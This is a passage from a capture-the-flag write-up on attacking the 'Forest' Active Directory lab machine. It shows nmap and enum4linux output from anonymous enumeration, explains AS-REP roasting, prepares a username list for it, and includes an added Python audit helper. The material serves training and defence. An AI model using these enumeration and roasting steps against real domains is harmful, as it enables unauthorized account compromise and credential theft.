Preface
This article is a writeup of Forest 📝
Wrapped in leaves, isn't it...
This time we attack an Active Directory environment.
If you are wondering what Active Directory even is, see here.
Machine Info
Name : Forest
IP Address : 10.10.10.161
OS : Windows 🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.161 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-05 11:52 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating NSE at 11:52
Completed NSE at 11:52, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:52
Completed Parallel DNS resolution of 1 host. at 11:52, 0.06s elapsed
Initiating SYN Stealth Scan at 11:52
Scanning 10.10.10.161 [1000 ports]
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Increasing send delay for 10.10.10.161 from 0 to 5 due to 230 out of 765 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 5 to 10 due to 11 out of 17 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 10 to 20 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 20 to 40 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 40 to 80 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 80 to 160 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 160 to 320 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.10.161 from 640 to 1000 due to 11 out of 12 dropped probes since last increase.
Discovered open port 464/tcp on 10.10.10.161
Completed SYN Stealth Scan at 11:55, 157.88s elapsed (1000 total ports)
Initiating Service scan at 11:55
Scanning 10 services on 10.10.10.161
Completed Service scan at 11:55, 22.31s elapsed (10 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.161
Retrying OS detection (try #2) against 10.10.10.161
Retrying OS detection (try #3) against 10.10.10.161
Retrying OS detection (try #4) against 10.10.10.161
Retrying OS detection (try #5) against 10.10.10.161
Initiating Traceroute at 11:55
Completed Traceroute at 11:55, 0.30s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:55
Completed Parallel DNS resolution of 2 hosts. at 11:55, 0.01s elapsed
NSE: Script scanning 10.10.10.161.
Initiating NSE at 11:55
Completed NSE at 11:55, 15.00s elapsed
Initiating NSE at 11:55
Completed NSE at 11:56, 8.13s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Nmap scan report for 10.10.10.161
Host is up (0.25s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-05 03:01:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/5%OT=88%CT=1%CU=34261%PV=Y%DS=2%DC=T%G=Y%TM=65976
OS:FC0%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%
OS:SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST
OS:11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=200
OS:0%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.004 days (since Fri Jan 5 11:50:52 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h46m49s, deviation: 4h37m10s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-01-04T19:02:30-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-01-05T03:02:27
|_ start_date: 2024-01-05T02:57:59
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 292.77 ms 10.10.14.1
2 292.92 ms 10.10.10.161
NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.38 seconds
Plenty of ports are open.
・88/tcp
・135/tcp
・139/tcp
・445/tcp
These are the ones to keep an eye on.
It is also useful to know that Windows Server 2016 is running and that the domain name is htb.local.
Name Resolution
We need name resolution, so add this line to /etc/hosts:
10.10.10.161 htb.local
Enumeration
enum4linux
enum4linux helps with information gathering: retrieving user information, collecting shared resources, retrieving group information, and checking the SMB version and settings.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# enum4linux -a -u "" -p "" 10.10.10.161
-u "" -p "" sets an empty username and password to try a null session (anonymous access).
Run it.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# enum4linux -a -u "" -p "" 10.10.10.161
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 6 15:59:04 2024
=========================================( Target Information )=========================================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.161 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.161 )================================
Looking up status of 10.10.10.161
No reply from 10.10.10.161
===================================( Session Check on 10.10.10.161 )===================================
[+] Server 10.10.10.161 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.161 )================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.161 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.10.161 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.161 )=======================================
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null)Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: AdministratorDesc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda BergerDesc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=================================( Share Enumeration on 10.10.10.161 )=================================
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.161
============================( Password Policy Information for 10.10.10.161 )============================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.10.10.161 )=======================================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Account Operators' (RID: 548) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
==================( Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.10.161 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Jan 6 16:09:10 2024
We got a good amount of information.
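The enum4linux user listing already contains the most security-relevant detail of this box: the acb value is the SAMR USER_ACCOUNT bit field (MS-SAMR 2.2.1.12), and svc-alfresco's 0x00010210 differs from the other users' 0x00000210 by bit 0x00010000, USER_DONT_REQUIRE_PREAUTH. The following is an added example, not part of the original writeup: a small audit helper that decodes those bits and reports the account settings a defender should review (pre-authentication disabled, password not required, password never expires). The sample text is a constructed subset of the enum4linux lines above.

```python
"""Audit helper for enum4linux user listings (added example, not from the writeup).
Decodes the SAMR 'acb' account-control bits and flags risky account settings."""
import re

# USER_ACCOUNT codes from MS-SAMR 2.2.1.12 (the value enum4linux prints as 'acb').
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQD",
}

# Matches the 'index: ... RID: ... acb: ... Account: ...' lines enum4linux prints.
USER_LINE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)",
    re.IGNORECASE,
)


def decode_acb(acb: int) -> list[str]:
    """Return the names of all set ACB bits, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_users(text: str) -> list[dict]:
    """Parse enum4linux user lines into {account, rid, acb} dicts."""
    users = []
    for m in USER_LINE.finditer(text):
        rid, acb, account = m.groups()
        users.append({"account": account, "rid": int(rid, 16), "acb": int(acb, 16)})
    return users


def audit(text: str) -> dict[str, list[str]]:
    """Group enabled accounts by the settings a defender would want to review."""
    findings = {"no_preauth": [], "password_not_required": [], "password_never_expires": []}
    for u in parse_users(text):
        flags = decode_acb(u["acb"])
        if "DISABLED" in flags:
            continue  # a disabled account cannot be used to obtain an AS-REP
        if "DONT_REQUIRE_PREAUTH" in flags:
            findings["no_preauth"].append(u["account"])
        if "PWNOTREQ" in flags:
            findings["password_not_required"].append(u["account"])
        if "PWNOEXP" in flags:
            findings["password_never_expires"].append(u["account"])
    return findings


# Constructed sample: a subset of the enum4linux lines shown in this writeup.
SAMPLE = """\
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: AdministratorDesc: Built-in account
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
"""

if __name__ == "__main__":
    for u in parse_users(SAMPLE):
        print(f"{u['account']:<16} rid={u['rid']:<5} {' | '.join(decode_acb(u['acb']))}")
    print(audit(SAMPLE))
```

Feed it the full "Users on 10.10.10.161" section and the no_preauth list is exactly the set of accounts an AS-REP request would succeed for, which is what GetNPUsers.py confirms later on.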
Initial Infiltration
ASREPRoasting Attack
Now that we have user information, let's do an ASREPRoasting attack.
What is an ASREPRoasting attack?
ASREPRoasting is an attack technique that targets Kerberos, the authentication protocol used in Windows environments.
Simply put, it is "a technique for finding users that do not require Kerberos pre-authentication".
It abuses the AS-REP response, which is part of the Kerberos authentication protocol.
You obtain the AS-REP response for a target domain user (part of it is encrypted with a key derived from the user's password, so it can be attacked offline). You then crack this AS-REP response to recover the user's password.
- Preparation -
Before ASREPRoasting, let's do some preparation.
Create a user list from the user information obtained earlier.
For now, just paste it in.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# touch users.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# vi users.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Extract just the usernames from this. I named the new file Usernames.txt.
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# grep -oP 'user:\[\K[^]]+' users.txt > Usernames.txt
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat Usernames.txt
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
